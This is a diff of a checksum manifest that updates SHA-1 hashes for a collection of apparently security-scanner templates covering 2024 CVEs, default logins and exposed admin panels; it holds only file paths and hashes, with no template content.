http/cves/2024/CVE-2024-27199.yaml:6004f38f3a24fbb3a951270191c4af21b6e14e2d http/cves/2024/CVE-2024-27348.yaml:6af6e5ad3b0eae4fa48d1937d51d5a5b767395b5 -http/cves/2024/CVE-2024-27497.yaml:60398b33810f93340a2641b108c2ed83ed635e88 -http/cves/2024/CVE-2024-27564.yaml:59fbfb7c059d110b9a807d0d2205058ae1326e6b +http/cves/2024/CVE-2024-27497.yaml:8184b8144cb37b59f55167efd79fbdb718b771f7 +http/cves/2024/CVE-2024-27564.yaml:2d7cd805376bddeea95532fe6833cb3d4a2f7ff4 http/cves/2024/CVE-2024-27954.yaml:fe69ea721d3341747af165f3378e4f8bedb2ff43 http/cves/2024/CVE-2024-27956.yaml:b6cecd7a2c5dd148c961bcacc9d6bc9075c9b90c http/cves/2024/CVE-2024-28255.yaml:d7b149c542f2dba2d719e547ddc497ad029532e8 http/cves/2024/CVE-2024-28734.yaml:282a40ba7cd7f653bfbc9f16397b9c6115ca18b1 http/cves/2024/CVE-2024-2876.yaml:33b7f45b1e5e63e6936315618a667d8cd07d054b http/cves/2024/CVE-2024-2879.yaml:c2ce4ab84a2eac56ef529eeba7a3749e0394cd43 -http/cves/2024/CVE-2024-29059.yaml:8a60190e64510b3ac7fba68a3aced102feceb5c5 +http/cves/2024/CVE-2024-29059.yaml:40c3c60a5ebd44c5060613c2aedf947d25fa38a9 http/cves/2024/CVE-2024-29269.yaml:b0c582055d752cae9d0837e9c4919e94c0fdf100 -http/cves/2024/CVE-2024-3097.yaml:8e86907f792754159cff9538655c090689d79784 +http/cves/2024/CVE-2024-3097.yaml:4fdafc24ac5001b7685fc40aee096450dee38ddc http/cves/2024/CVE-2024-3136.yaml:0bdd17ee8bfd01bba9b229c8ddfcdb53092dacf2 -http/cves/2024/CVE-2024-31621.yaml:d0336b01545c56f67a5ee9a174f52e660861e3bc -http/cves/2024/CVE-2024-31848.yaml:964b3ea6c30926284050eaca30c9aea8021784fc -http/cves/2024/CVE-2024-31849.yaml:0af61ea378a0dfbf2d49cdb29315b87731f95662 -http/cves/2024/CVE-2024-31850.yaml:7855c674a896328dd31f2980fa7e758cfca95847 -http/cves/2024/CVE-2024-31851.yaml:75629a1e21a26e599dce39fcf8272cf24236cacf +http/cves/2024/CVE-2024-31621.yaml:24117c9ab9f95116bb4cdbdd1102c251d2f5d14f +http/cves/2024/CVE-2024-31848.yaml:2ae880277f0c2a88e232abb5b987e4c6e40940bf +http/cves/2024/CVE-2024-31849.yaml:a4b3067e6a7bfb3168a4db0bdc6c51c986adf08b +http/cves/2024/CVE-2024-31850.yaml:8fcc758e6f7344016342d2ed9f4977b493a6bdd3 +http/cves/2024/CVE-2024-31851.yaml:1176cabeef0f6f79d2d8c40b33c3e2ab50c1405b http/cves/2024/CVE-2024-32399.yaml:d49df2f63485c7f67792285af884f5daa53513b5 -http/cves/2024/CVE-2024-32640.yaml:0aea7a618e8eba9f193f25c129d1d03e3bb15921 -http/cves/2024/CVE-2024-32651.yaml:644d79d1e5be106386851b644d904c48a003d4b5 -http/cves/2024/CVE-2024-3273.yaml:90b3bda22f55a43e5a3a59e482161317d6f26f36 +http/cves/2024/CVE-2024-32640.yaml:5823b03fab54f2919f661639c4fd761ccc35d2e5 +http/cves/2024/CVE-2024-32651.yaml:b86dd95c3247a2f798ffd14dac8bdf95ce9e7e70 +http/cves/2024/CVE-2024-3273.yaml:93a1a60547b4c6b918fa02cd8c3a0d9d0b758835 http/cves/2024/CVE-2024-33288.yaml:021f1910a0468103d59167ac39fc9cf77f246bab -http/cves/2024/CVE-2024-33575.yaml:3ab58da58f0076d6b593ca0ac312d8fc53a10f03 -http/cves/2024/CVE-2024-33724.yaml:54d8f232b79b426f6e06e8300b3fb141224f7ed2 -http/cves/2024/CVE-2024-3400.yaml:0d91cd0f3d285a63864754f7d2a0fcab4e54b7af -http/cves/2024/CVE-2024-34470.yaml:a5518a2ed26dd99303e2e20f7356eece7f2dc927 +http/cves/2024/CVE-2024-33575.yaml:1e90c73e7fb583bb1ff28b4b322eaa5c006f3b62 +http/cves/2024/CVE-2024-33724.yaml:76df3a28985980cc0751d3e11c46d90ff640bb4d +http/cves/2024/CVE-2024-3400.yaml:37f1b4af464c36e8cf38b56c05f0bd2b4870c810 +http/cves/2024/CVE-2024-34470.yaml:874af56b325acd3274264aa15900d58301eb4286 http/cves/2024/CVE-2024-3495.yaml:1f4e6d704c91902aa02887883d46718b45f87654 -http/cves/2024/CVE-2024-3822.yaml:3b09a61773b3f696a26e7a152cfa5d1968aa9dc8 -http/cves/2024/CVE-2024-4040.yaml:9470254ef11bec4f99022dac385a6198071a2cad -http/cves/2024/CVE-2024-4348.yaml:82d6d18aedb35323e1c359a8467f30ab49a8aae9 -http/cves/2024/CVE-2024-4358.yaml:e64b958f2da8291fef4dee711db632c9f4e6cea0 -http/cves/2024/CVE-2024-4956.yaml:a00f92400517494320ec968d237c98bb1056de25 +http/cves/2024/CVE-2024-3822.yaml:fc038c91b44d50e8c94eaae1fc8ec57990f09419 +http/cves/2024/CVE-2024-4040.yaml:12a289f25fe2eed39f2d10e0acc42f072f33a6c8 +http/cves/2024/CVE-2024-4348.yaml:0c8cb2b8d92cd6efe70b6501e2c1a8efd764de03 +http/cves/2024/CVE-2024-4358.yaml:56a00c719f78cfb208b48d94745ba8e1dcbaac39 +http/cves/2024/CVE-2024-4956.yaml:8a5cd465ace7b7ea128a005b07edb831b4384aa6 http/cves/2024/CVE-2024-5230.yaml:8b073f5f6aa9e22b66403c2c6297fb487fbade0c -http/default-logins/3com/3Com-wireless-default-login.yaml:7c816fc8c0b14d7f9c5b111259ca75c4f96a4671 +http/default-logins/3com/3Com-wireless-default-login.yaml:3873c626c80c5a5e86d5dfed92403e7984c92a22 http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce http/default-logins/3ware-default-login.yaml:c4ee7d8f55d3a9a6e674b4706b87321bbf25cfda http/default-logins/UCMDB/ucmdb-default-login.yaml:627864b8eb2c47b7c717e1ed1800ba39eee5410c @@ -3336,7 +3336,7 @@ http/default-logins/alibaba/canal-default-login.yaml:53bee91e5473ba3be493bdb74fc http/default-logins/allnet/allnet-default-login.yaml:bdc1b0fae7b08909a071f9b452800f8b37b4b2ea http/default-logins/alphaweb/alphaweb-default-login.yaml:c70e96a6e9ed34b5fe721cc25c004aa4c66a59c9 http/default-logins/ambari/ambari-default-login.yaml:c7f2072fb639a02e718d877dcc7369f02f4a8cfe -http/default-logins/ampjuke-default-login.yaml:5e1655762197af52d69e68706d186e6043549f2c +http/default-logins/ampjuke-default-login.yaml:96b17a8f185a7fd318fa05f100e39c995df66815 http/default-logins/apache/airflow-default-login.yaml:f4a72dcfe661dbfb227717d3201877b185af4d7b http/default-logins/apache/apisix-default-login.yaml:88d0d5d11425c2cadb204d0afb7b26d8df4376fe http/default-logins/apache/dolphinscheduler-default-login.yaml:1e4031c994ea6c6aa571dad9a5e7ccbf908e2251 @@ -3349,22 +3349,22 @@ http/default-logins/apache/tomcat-default-login.yaml:a057ed0e19a54a1c131347568ad http/default-logins/apache/tomcat-examples-login.yaml:a9fc4069a07f30642160b89c1b2fd791fef60d48 http/default-logins/apollo/apollo-default-login.yaml:d1616da4d6f3aed8f63bdf7eaed893ced48f8c2d http/default-logins/arl/arl-default-login.yaml:6397a0cc463fb34e61c64f77018ae1b08a3738fe -http/default-logins/asus/asus-rtn16-default-login.yaml:862748db77404b0a828eb333da80bb7d4d08e5ba -http/default-logins/asus/asus-wl500g-default-login.yaml:95d1de33a4285c5de94ea47fd28af5d77e11a8ea -http/default-logins/asus/asus-wl520GU-default-login.yaml:cc44685961ecfb781b66ceaabc22bb5eff412896 +http/default-logins/asus/asus-rtn16-default-login.yaml:c1ec71b690a66abb90cf23e630a7e9832e4cff46 +http/default-logins/asus/asus-wl500g-default-login.yaml:bea4c96619b92dc52336af108a7fc5cda2a5f9e4 +http/default-logins/asus/asus-wl520GU-default-login.yaml:a58962befcd518f0a14bce9b092453cf0d5ec675 http/default-logins/audiocodes/audiocodes-default-login.yaml:46660eeb6fae382ddf01771604dd52774904bade http/default-logins/azkaban/azkaban-default-login.yaml:fd08250d7e9178eaeb7c0d8f8df828e113598d7f http/default-logins/barco-clickshare-default-login.yaml:cac1f9f84f536daf4f7d3b21a9dda47d9d538214 http/default-logins/batflat/batflat-default-login.yaml:983b4bc3ea5162cd92de42686894cfde4482ca8d http/default-logins/bloofoxcms-default-login.yaml:521262f1b70cf41dabf50e7022c8d6874ad6f472 http/default-logins/caimore/caimore-default-login.yaml:fa6dc9fbfefd35cbe6b0122cbe2063f51286d122 -http/default-logins/cambium-networks/cambium-networks-default-login.yaml:8ddd3872b928f4d2a97a7240e5f4b71ae5a2e1f5 +http/default-logins/cambium-networks/cambium-networks-default-login.yaml:4364696c74e926e0ff950343d9fd023a9d7c776a http/default-logins/camunda/camunda-default-login.yaml:e0ba275d0aeadc4a4e0df5010277d2db9e6329e7 http/default-logins/chinaunicom/chinaunicom-default-login.yaml:825cceb7abec9ba21938e316e8748da23c72c82a http/default-logins/cobbler/cobbler-default-login.yaml:2994d59f748f3b084644bb25989f6ecc8ea81a2a http/default-logins/cobbler/hue-default-credential.yaml:810629da57236ea925fc51305d98564392a5b017 -http/default-logins/crushftp/crushftp-anonymous-login.yaml:a6d2f07b7d1cf46d5d6bcdaff367a7b12ef99aed -http/default-logins/crushftp/crushftp-default-login.yaml:51a1603c2838c8237672659ffd177f959a70a599 +http/default-logins/crushftp/crushftp-anonymous-login.yaml:ed1021e3d89624d02488951a27b653e8ae9b48cd +http/default-logins/crushftp/crushftp-default-login.yaml:af0406f795cbe0409eb6334f5f9bfc385089a190 http/default-logins/d-link/dlink-centralized-default-login.yaml:144088e9a738b069bd642d60d64993447e44f264 http/default-logins/dataease/dataease-default-login.yaml:b0bd13ca24f63ec494c00e52233168059a5c0b75 http/default-logins/datahub/datahub-metadata-default-login.yaml:75c046c42ef30be2401e7d782f6933e71084bfab @@ -3373,7 +3373,7 @@ http/default-logins/dell/dell-dpi-default-login.yaml:c8dabcfcdb39d6a22dd877512d2 http/default-logins/dell/dell-idrac-default-login.yaml:1dc3a2376aeb7ca1b68b49de2fb293c5d3f988d5 http/default-logins/dell/dell-idrac9-default-login.yaml:ff8233327b0de4c8fad6255f51c14ec0771fb8de http/default-logins/dell/emcecom-default-login.yaml:67e9a911b490370e01545f18a1ed6adbb5333fb8 -http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml:349ed67c3abeedfb09c053fc0c7d7b366e71cc74 +http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml:73cad2502bfc11185fad1a2819627868c3a9faa6 http/default-logins/digitalrebar/digitalrebar-default-login.yaml:87a2a0df776e6ceab4b3a02845b43bf93f6d3ada http/default-logins/druid/druid-default-login.yaml:cdf960a64c7f527a149b2a1b5cf62b7d40c4aeee http/default-logins/dvwa/dvwa-default-login.yaml:0803d0330a8ea7cbd071f03e54c1ea65d415ee76 @@ -3431,7 +3431,7 @@ http/default-logins/nacos/nacos-default-login.yaml:489f794fa8d86511bf97ce5b2b9f9 http/default-logins/nagios/nagios-default-login.yaml:5be447e727ec6ec2763d2ffb167419587ceb9bc9 http/default-logins/nagios/nagiosxi-default-login.yaml:60ae84bfb173f6a3851c97e22fb4cbab0b540c6f http/default-logins/netsus/netsus-default-login.yaml:8979ce668c655546a5ab1ae6252ccca18f7da07a -http/default-logins/next-terminal/next-terminal-default-login.yaml:ab372ae5ab3bd16be3f2d0ae342e5979f944e963 +http/default-logins/next-terminal/next-terminal-default-login.yaml:bb35301c6a8ebaf435d260bfa69ee6ce8ffff90c http/default-logins/nexus/nexus-default-login.yaml:8041be21504ba54971e8b36ab505890e8117bece http/default-logins/node-red/nodered-default-login.yaml:63047dac792178afae65bca7b9c3ee1818402629 http/default-logins/nps/nps-default-login.yaml:7ce66f9f9d21efbb11af4aea88d07d0546aed856 @@ -3455,7 +3455,7 @@ http/default-logins/others/supershell-default-login.yaml:a838878b8d6b3bf44662292 http/default-logins/others/telecom-gateway-default-login.yaml:2e09596822f3a71579d9d6eeebcd911a7e2d2ace http/default-logins/paloalto/panos-default-login.yaml:8112483d459c35b60fe939b9302cc2c24a6fccd1 http/default-logins/panabit/panabit-default-login.yaml:716127317efff1f20eafc1ca729de249d15b7b28 -http/default-logins/pentaho/pentaho-default-login.yaml:b9efdc93e9782e05def22b0b6a1877873b0c42a9 +http/default-logins/pentaho/pentaho-default-login.yaml:35b3d5704b6ed25febcdd69bee69829702878247 http/default-logins/phpmyadmin/phpmyadmin-default-login.yaml:e0a11721f2d1926506b1207e62966aa3b5412685 http/default-logins/powerjob-default-login.yaml:e6467f6399b1787f4ae84c64cd1bef121c456b7f http/default-logins/powershell/powershell-default-login.yaml:977536a30d22da42d1ab8865b0d765d7e8da53a7 @@ -3481,15 +3481,15 @@ http/default-logins/smartbi/smartbi-default-login.yaml:62ea338413d060ca9e21ffdac http/default-logins/softether/softether-vpn-default-login.yaml:592f93a18fc9a97f31d8a29780dcb874e255d244 http/default-logins/solarwinds/solarwinds-default-login.yaml:37255b4d25b1aed06374df59af8da5a1ff8993cd http/default-logins/sonarqube/sonarqube-default-login.yaml:46757166900a43af2c1587461e43a72a6aabc1b5 -http/default-logins/soplanning/soplanning-default-login.yaml:3c498e1990912358f380b450f3d4f18fdfa0ebb1 +http/default-logins/soplanning/soplanning-default-login.yaml:61057d6002c2c34977a7bb264064b9bd90f9307e http/default-logins/spectracom/spectracom-default-login.yaml:7c514a27f7ce59eef6cc11b96b71847744a1b2e7 http/default-logins/splunk/splunk-default-login.yaml:c004b6e534b8b20e57ee70d52d098be812b99a40 http/default-logins/stackstorm/stackstorm-default-login.yaml:0274c411f83fd1b0a84f76713be8f34aec66468c http/default-logins/steve/steve-default-login.yaml:c0201d124a9cb45a95329d12f3321df228c43630 -http/default-logins/structurizr/structurizr-default-login.yaml:026c247f19f8fa78345338a6e3bef3bd04f7f33a +http/default-logins/structurizr/structurizr-default-login.yaml:321b2add36b7411c057d215594292834cbdabe1d http/default-logins/supermicro/supermicro-default-login.yaml:1795c26b29040cb74d72843237c8c1c65d153833 http/default-logins/szhe/szhe-default-login.yaml:0063e1b2cc9e3247cc5f9a737c087f6e85c0a001 -http/default-logins/timekeeper/timekeeper-default-login.yaml:873d7492b4b4478ec18efd3c5b12322f9a5bcc0f +http/default-logins/timekeeper/timekeeper-default-login.yaml:1b5797b8780e698e7883baa9c214109ef1cfed58 http/default-logins/tiny-file-manager-default-login.yaml:e8fb475d5569568291015956b0f2c66a4a1128cf http/default-logins/tooljet/tooljet-default-login.yaml:18d5e3f549906c28523ba6872ee051ed92df0bc4 http/default-logins/trassir/trassir-default-login.yaml:cbf62608f47efbff9049cd9540611ae4a0a23e51 @@ -3500,7 +3500,7 @@ http/default-logins/vidyo/vidyo-default-login.yaml:1022791dbb1f5128577c384b14cb5 http/default-logins/viewpoint/trilithic-viewpoint-login.yaml:b001db8da3f85c1e0d0cb551fe69fcef5083d6cd http/default-logins/visionhub/visionhub-default-login.yaml:b56eb860c30e4d0c611392437e18245ae6d994fa http/default-logins/wayos/ac-weak-login.yaml:9ac5c6fffbaa09f5459e593e5df4626808733f2a -http/default-logins/wazuh-default-login.yaml:f15cd921f33fbbdfb8f8bf8f37b5d9a9b063db9e +http/default-logins/wazuh-default-login.yaml:0963c74688a7cb878cec12fda47add666856d67b http/default-logins/weblogic/weblogic-weak-login.yaml:f619a9c8b20569891ca39be379d0fc4674a379b9 http/default-logins/webmethod/webmethod-integration-default-login.yaml:9c2a188c83f5486402db79336476a2810b8f5aee http/default-logins/webmin-default-login.yaml:7fe6bf9a16301b60194d8527800c413cbe445df0 @@ -3511,1121 +3511,1121 @@ http/default-logins/xerox/xerox7-default-login.yaml:5158227bdfb400df05fbf08175e7 http/default-logins/xnat/xnat-default-login.yaml:f044d249cdc9b51784a6a51aa7a7a59f8ed15f6b http/default-logins/xploitspy/xploitspy-default-login.yaml:db31a4b4ca180e8f2be7e81c1e9f34135bbc222a http/default-logins/xui-weak-login.yaml:b6222285e91d345320907acf58cf5784a0c1a346 -http/default-logins/xxljob/xxljob-default-login.yaml:8a44b2be13078974619f5c8b8046a0f4c6728baf +http/default-logins/xxljob/xxljob-default-login.yaml:5b927696d91a5d93d6e72ef3af368a0781bd088c http/default-logins/yealink/yealink-default-login.yaml:1c09abc636a37838c637cc287040bde60590b27f -http/default-logins/zabbix/zabbix-default-login.yaml:6a7abb463396245a28e0f2974ff5fb3a80355b6d +http/default-logins/zabbix/zabbix-default-login.yaml:addc8b6d436210926f2dd83a1cace3c72fdb6ab2 http/default-logins/zmanda/zmanda-default-login.yaml:8c81afd379909dea4700a9204c4f38a9b2c0df17 -http/exposed-panels/3cx-phone-management-panel.yaml:555b78d50ee081787d041437f022f4bb14137082 -http/exposed-panels/3cx-phone-webclient-management-panel.yaml:aa23fd32f61371cfe8a464bf1f224d0fa95d687f +http/exposed-panels/3cx-phone-management-panel.yaml:962f444db1517bfc6a6a6e6b1718830adb4a733f +http/exposed-panels/3cx-phone-webclient-management-panel.yaml:acaefcf8eab4eca7a6bce9c1955bedfd9c5eeba8 http/exposed-panels/3g-wireless-gateway.yaml:5144fcfd72ba87d6c10623148d468f3d0cca5984 -http/exposed-panels/acemanager-login.yaml:0197d85b74ad6a243f7722048e36b0fcd64f9862 -http/exposed-panels/acenet-panel.yaml:b88e1211a38547cc9d8ee15228197eb2d9512430 +http/exposed-panels/acemanager-login.yaml:767d4ff238c7d9411738bd97608dfc49a389a608 +http/exposed-panels/acenet-panel.yaml:a7bdd5bef722f284016edcb2dd6c69202a882f26 http/exposed-panels/achecker-panel.yaml:5c7e9d3946502e0f479d98cb9a3ba27b2e5a9a9c -http/exposed-panels/ackee-panel.yaml:fc048c64a3be4b70abcbbdab43592287f34db03d -http/exposed-panels/acrolinx-dashboard.yaml:2238288d59b3af798ae446173975a84abb7dfcea -http/exposed-panels/acti-panel.yaml:628420846539ed0cf69e5689f49ab4e57a26a451 -http/exposed-panels/active-admin-exposure.yaml:504071b3c78140c2d6866df302226fe9f7bdd733 -http/exposed-panels/activemq-panel.yaml:c4eaa82418c05a78020d3e2dbb505a23406d3298 -http/exposed-panels/acunetix-login.yaml:ba58b4ab2cf0698b37f8c5c1b579b2256f87692f +http/exposed-panels/ackee-panel.yaml:a8fad515166d180b18270c842ea52ea7d5f2c13c +http/exposed-panels/acrolinx-dashboard.yaml:ee6d3ea3dc95ef9c7920ad0c4d8097ccb56e784b +http/exposed-panels/acti-panel.yaml:2459ec994303d689f173c2e2dd7da4e61c994f42 +http/exposed-panels/active-admin-exposure.yaml:ab6444819a86a0bc5bfc939250a1f86111a04116 +http/exposed-panels/activemq-panel.yaml:214c9127783602962878dd1b5b3df0995c518bbd +http/exposed-panels/acunetix-login.yaml:2b6114a0ca48f43cfb800bc36e2b58e1d398dcf8 http/exposed-panels/acunetix-panel.yaml:b10cd9d4a29dea26e161ddeb85b6b920efd69870 -http/exposed-panels/addonfinance-portal.yaml:4700499c72e0b362a546e45a753c59b7d3a31c33 -http/exposed-panels/adhoc-transfer-panel.yaml:9353cf558e2f365342ec3eefb524890ee29fdd2c -http/exposed-panels/adiscon-loganalyzer.yaml:0e7428f0257bd04abb860dd63dd25bfb8721fae2 -http/exposed-panels/adminer-panel-detect.yaml:cde1609d7a17ed7155ccf89096232f3e83784f41 -http/exposed-panels/adminer-panel.yaml:1506db71fb5c57b31698a5cabc2c458bd719a67f -http/exposed-panels/adminset-panel.yaml:8fe6ff50d6f2fa8f8e02d56fc9324ba34d144490 -http/exposed-panels/adobe/adobe-component-login.yaml:217ae56e2c3b1a829ab5109b10ab7ea32d259922 -http/exposed-panels/adobe/adobe-connect-central-login.yaml:519fd5dea8681edcdb42de10924dfd695edf373a -http/exposed-panels/adobe/adobe-experience-manager-login.yaml:626300ed5762decfdba529bd6d684954b00e78ff +http/exposed-panels/addonfinance-portal.yaml:e2bbd509c6935dfb63438d444227d40c524f6810 +http/exposed-panels/adhoc-transfer-panel.yaml:1a105d721af5acff0621d0ac21e2b26e28c22a94 +http/exposed-panels/adiscon-loganalyzer.yaml:45d9b9356aee1b3cad07aca495f4211b8276c4b8 +http/exposed-panels/adminer-panel-detect.yaml:8bbbd5e809281cd9348c839183bda14179f472e7 +http/exposed-panels/adminer-panel.yaml:e388258c0af3c9ee3113044c9f10e6e4495494f4 +http/exposed-panels/adminset-panel.yaml:f1bb5d8a3cf287e556f1ed365704ed69bba73f93 +http/exposed-panels/adobe/adobe-component-login.yaml:edffeb9320f33034177b57bccb9ba3a435e87952 +http/exposed-panels/adobe/adobe-connect-central-login.yaml:f7411012c78bfabdd304746a29d09843c4959971 +http/exposed-panels/adobe/adobe-experience-manager-login.yaml:50e79afd8faa107b9f41d6e0ada2348a395d6cba http/exposed-panels/adobe/adobe-media-server.yaml:b916d4fa9a0d1966e18b42a850154f1a66563020 -http/exposed-panels/adobe/aem-crx-package-manager.yaml:f2276d6404ea26aa5fee1792167e4929035b4664 -http/exposed-panels/adobe/aem-sling-login.yaml:d067ada6081e871999679fc61aad348c94507bf9 +http/exposed-panels/adobe/aem-crx-package-manager.yaml:4e9af6c8fd14b053a9a4bfbbaf13ea253ad11456 +http/exposed-panels/adobe/aem-sling-login.yaml:d118a32d9092eef6bb528adaa3943db34ebd8ee7 http/exposed-panels/advance-setup.yaml:962911eb49a56355a94abf4fd7ac33a0febd7002 http/exposed-panels/aerohive-netconfig-ui.yaml:521d33561c7483fa80b401a3836027322e264c7e http/exposed-panels/afterlogic-webmail-login.yaml:32be3f18ab5d14eecf44fe540c77955ab37b7b30 -http/exposed-panels/aircube-dashboard-panel.yaml:c190bb87a55b2816d4b8a6734395a8d9a0987892 -http/exposed-panels/aircube-login.yaml:ebe4b1486285bc388b1443ca13d40e396024cc08 -http/exposed-panels/airflow-panel.yaml:73fca507f0b290fdb254039de606513276d0c5ad -http/exposed-panels/airnotifier-panel.yaml:af0fe72034df681134b3c2e39ed53f135f127082 -http/exposed-panels/akamai-cloudtest.yaml:34911ca7d2b6bd5816b4def55d62ce0bb0b4ce76 +http/exposed-panels/aircube-dashboard-panel.yaml:42344a2f0c7a57240b69c274ee8f6a17605732e2 +http/exposed-panels/aircube-login.yaml:18f9d2c98c9d6bf51426747e516ac279955fd9ac +http/exposed-panels/airflow-panel.yaml:d0615086ebcf18d5be814d2c378a72766a90173c +http/exposed-panels/airnotifier-panel.yaml:b99b43efa16656c9818965e373513fc45f439f94 +http/exposed-panels/akamai-cloudtest.yaml:6604266f5bf62a25b60020ca1c7542c8b27b1cdf http/exposed-panels/akhq-panel.yaml:225c16f11b7c067a4c58ffdb85bd9f67bb34c044 -http/exposed-panels/alfresco-detect.yaml:75f184462b0163274cb8cd4c4a2bf32282d481a1 -http/exposed-panels/algonomia-panel.yaml:a8d1524829cf69fe9d81c900b3e3a33c234870dc +http/exposed-panels/alfresco-detect.yaml:15b88d0e58c7d1e6b16c291ea9b1ce056a002cce +http/exposed-panels/algonomia-panel.yaml:0d3e254fd504e8195196a156eafb3f64d7935d6d http/exposed-panels/alienvault-usm.yaml:3b8b0250f6fbc636d0c3f3ed1e7fa3a4b77f798d -http/exposed-panels/allied-telesis-exposure.yaml:064666baf2b7dceaa0f1efff7f8713eb5d10ea3f -http/exposed-panels/ambari-exposure.yaml:3d0e2ecbc2973ec8a50a377965b29ee2ba352c5b -http/exposed-panels/amcrest-login.yaml:e7c8ca136e9250ff1d63b3404faf4ea5aeef9826 -http/exposed-panels/ametys-admin-login.yaml:7e159117f7191c2cf43630dcabbb50fd0a8ed4fc -http/exposed-panels/amp-application-panel.yaml:f3eecd47dc528d4cc4f332ad1ad30a8ddb03899e -http/exposed-panels/ampache-panel.yaml:3f32194170c64430b89ee42a9cfd4a8d0219766b +http/exposed-panels/allied-telesis-exposure.yaml:0088ba6ce885ba100ef070fed6578f4233b9ca44 +http/exposed-panels/ambari-exposure.yaml:83f0dafa0049ad72b019abab623d0aafa6c8716a +http/exposed-panels/amcrest-login.yaml:2f6d0805d7c00f57e00879993e38103962e476ef +http/exposed-panels/ametys-admin-login.yaml:5926dad9cf359115fb82b7316efd5f52cf866e78 +http/exposed-panels/amp-application-panel.yaml:bf778abddd74fa7de05ed30ddb51d8e25647b53e +http/exposed-panels/ampache-panel.yaml:0d28188dcccf400fbe3ac064813a842190574bc2 http/exposed-panels/ampps-admin-panel.yaml:e0f16ce05eb991824f64503f4b45c9dbecfc828d http/exposed-panels/ampps-panel.yaml:a0a85553bc90215dbb676f0a2e0086b6242fd3a1 -http/exposed-panels/amprion-gridloss-panel.yaml:73cee815a7838b9e0c4194574846022e028e805a -http/exposed-panels/anaqua-login-panel.yaml:c27171a1b8278f48ca70e0034ab68166d989b01a +http/exposed-panels/amprion-gridloss-panel.yaml:e3385be2e1d363ef00afba49c16e3ceac2169a35 +http/exposed-panels/anaqua-login-panel.yaml:1726b29bfd6159dccf30d591f670665d43740183 http/exposed-panels/ansible-semaphore-panel.yaml:8915ed933a720aa66d9e3ec25ac11bc215e542b3 -http/exposed-panels/ansible-tower-exposure.yaml:2c6bfd553582685d0847df767ef90270440716b6 -http/exposed-panels/apache/apache-apisix-panel.yaml:2ea899b548359d2406b8a4576eeca268406a122b -http/exposed-panels/apache/apache-mesos-panel.yaml:2fa694d1b3b7747c5dc1ea524a6766b4d2363585 -http/exposed-panels/apache/public-tomcat-manager.yaml:c22e014c580c1ca6d14f73e0eb6420a454e50cd6 -http/exposed-panels/apache-jmeter-dashboard.yaml:c1ffb3e0855225392f6559b0ffdac5ea304593ce -http/exposed-panels/apigee-panel.yaml:fb479e073e7b6a8d538b52c0bfb9396893b73af3 +http/exposed-panels/ansible-tower-exposure.yaml:e1220a24035bac69c906b46366c459e8b41d2a99 +http/exposed-panels/apache/apache-apisix-panel.yaml:74cd7d5e66964c27229f390eb52aa10b4802d46f +http/exposed-panels/apache/apache-mesos-panel.yaml:10e2bbd53e98f6977a960b63272d94eae82359e1 +http/exposed-panels/apache/public-tomcat-manager.yaml:58b066b6fea20fea447784de77b3085f8f85ceb4 +http/exposed-panels/apache-jmeter-dashboard.yaml:a6913f3b4c1b6622707fed4d7da3e88c0913454b +http/exposed-panels/apigee-panel.yaml:a60ad7642fdc480e7d5b56e5251edabedd276cf9 http/exposed-panels/apiman-panel.yaml:792e85ffecba966d6ff122f7ab1c6c9d6899c5aa -http/exposed-panels/appsmith-web-login.yaml:2cdcd3bce4df717b0cee6653359208fb1d302199 -http/exposed-panels/appspace-panel.yaml:b7db6a7bec813b211268f2c0ac38d9a8bdafe57d -http/exposed-panels/appsuite-panel.yaml:f226944121f64fbce5016ae077ce598c856d6928 -http/exposed-panels/appwrite-panel.yaml:44b05f5111d6834c6733ccf45a7ea8b50d929ceb +http/exposed-panels/appsmith-web-login.yaml:f5695ee85e7209785e0f6520057e5986e828a1ad +http/exposed-panels/appspace-panel.yaml:9efc67ff02c01219db47dbbfa1a4c4fa382995d7 +http/exposed-panels/appsuite-panel.yaml:ae0cd5edef9f9ce43b2addeb235a76c5fecfb5ef +http/exposed-panels/appwrite-panel.yaml:a2f47a398ec622212fe407c0cfe26a323a4c47f9 http/exposed-panels/aptus-panel.yaml:36678e2013d4dcc6f9a20e1da339c90a58efe911 -http/exposed-panels/aqua-enterprise-panel.yaml:f9c18e3f72270004658a91dfe4d3b8ab302c5e58 -http/exposed-panels/arangodb-web-Interface.yaml:6247326ca817a46fb439da002051b175e7aa6f15 -http/exposed-panels/arcgis/arcgis-panel.yaml:b92d410f8dacc2d0a8ee6d9a759414593c74af90 -http/exposed-panels/arcgis/arcgis-services.yaml:91ecf077c139da16cafb53fa590ec4a90a31a97d -http/exposed-panels/archibus-webcentral-panel.yaml:3fb72e4e87377027a2cdb7ae3a410f053e5941bf -http/exposed-panels/arcserve-panel.yaml:12a49ee58008512c836cf11f2777317f0c32a573 +http/exposed-panels/aqua-enterprise-panel.yaml:5711a0109255990a3dfd13b239251c84a6a2114e +http/exposed-panels/arangodb-web-Interface.yaml:0d80026c2e9c5a843edd33ffc5428869016883fc +http/exposed-panels/arcgis/arcgis-panel.yaml:ad5833ebac287faeeb276b7ad6b256b39cfdab58 +http/exposed-panels/arcgis/arcgis-services.yaml:0d6245753f01c7c932152fd5c85f95c44bb98867 +http/exposed-panels/archibus-webcentral-panel.yaml:c4ee6956765285f1f7c7309e224d1148d6430fa1 +http/exposed-panels/arcserve-panel.yaml:23e4c3ce985ce94a70dbad9b7d72bfd37580ee0d http/exposed-panels/argocd-login.yaml:d5d4e5e2aa719d7c17487622aa765bafaf48f6ef -http/exposed-panels/arris-modem-detect.yaml:ea92823d70b88ede3334737e83ce109577eec722 -http/exposed-panels/aspcms-backend-panel.yaml:82c4facf99ebaba43cf6d5ddc7195b964218430e -http/exposed-panels/aspect-control-panel.yaml:0ba42d099828eaee2e49830183e044f2ef7a650f -http/exposed-panels/asus-aicloud-panel.yaml:acaafc881b9cf7698ea58f92e78c4d8ed7df42db -http/exposed-panels/asus-router-panel.yaml:2ca8459385aa9ff8bd7fc8712eb1845b6aa1a8d4 -http/exposed-panels/atlantis-detect.yaml:0202f0297dc86c99568a870addd732f0f3e2f192 -http/exposed-panels/atlassian-bamboo-panel.yaml:c18281a4e1a96c40a1463f0807c7feb7423915aa -http/exposed-panels/atlassian-crowd-panel.yaml:e6add25b24ba1ae66dc6bb7b9b84802df6ba2342 +http/exposed-panels/arris-modem-detect.yaml:f805ac4a64a32e733e500262a73f87e3cf36d252 +http/exposed-panels/aspcms-backend-panel.yaml:90055663c7ba8e685e68c03e3630eb783a1c9f76 